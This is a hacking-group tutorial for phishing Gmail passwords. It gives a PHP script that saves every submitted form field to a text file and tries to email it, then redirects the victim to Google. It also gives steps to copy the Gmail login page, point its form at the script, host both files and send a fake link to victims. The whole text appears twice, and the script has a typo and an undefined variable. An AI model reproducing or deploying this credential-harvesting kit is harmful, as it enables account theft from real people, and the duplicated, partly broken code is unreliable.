Requirements
1: First we are creat a php script that will save password in a txt file if you have any problem to download link so copy this scrip and past in new notepad and save as a hackhippo.php
------------------------------------------------------------------------------------------------------------
<?php
header ('Location:http://google.com');
$posts = '';
foreach($_POST as $k => $v){
$posts .= '$_POST['.$k.'] = '.$v."\n";
}
$posts .= "---------------------------------------------------\n";
$subject = $_SERVER['HTTP_HOST']."-".$_SEREVER['SERVER_NAME'];
$body = '
'.$posts.'
';
@mail($emailto, $subject, $body, $from);
$handle = @fopen("pass.txt", "a+");
@fwrite($handle, $posts);
fclose($handle);
?>
------------------------------------------------------------------------------------------------------------
2: now go to php script header ('Location:https://accounts.google.com'); this url is where the victim is redirect.
3: creating fake login page go to firefox open gmail right click and go to view source and select all and copy
to new notepad and find the action="https://accounts.google.com/ServiceLoginAuth"
and we are replace that part with action="hackhippo.php" and now save this file as a index.html
4: now upload these 2 file (index.html and hackhippo.php ) to a web host. and generate a fake link and send to victim the link you got the pasword on your web hosting directory where you upload these index.html and hackhippo.php
- Php Script: Download
- Web Hosting: http://www.my3gb.com/
1: First we are creat a php script that will save password in a txt file if you have any problem to download link so copy this scrip and past in new notepad and save as a hackhippo.php
------------------------------------------------------------------------------------------------------------
<?php
header ('Location:http://google.com');
$posts = '';
foreach($_POST as $k => $v){
$posts .= '$_POST['.$k.'] = '.$v."\n";
}
$posts .= "---------------------------------------------------\n";
$subject = $_SERVER['HTTP_HOST']."-".$_SEREVER['SERVER_NAME'];
$body = '
'.$posts.'
';
@mail($emailto, $subject, $body, $from);
$handle = @fopen("pass.txt", "a+");
@fwrite($handle, $posts);
fclose($handle);
?>
------------------------------------------------------------------------------------------------------------
2: now go to php script header ('Location:https://accounts.google.com'); this url is where the victim is redirect.
3: creating fake login page go to firefox open gmail right click and go to view source and select all and copy
to new notepad and find the action="https://accounts.google.com/ServiceLoginAuth"
and we are replace that part with action="hackhippo.php" and now save this file as a index.html
4: now upload these 2 file (index.html and hackhippo.php ) to a web host. and generate a fake link and send to victim the link you got the pasword on your web hosting directory where you upload these index.html and hackhippo.php
© HaCkHiPp0-TeaM.
R0oTx:Sahil_Rai
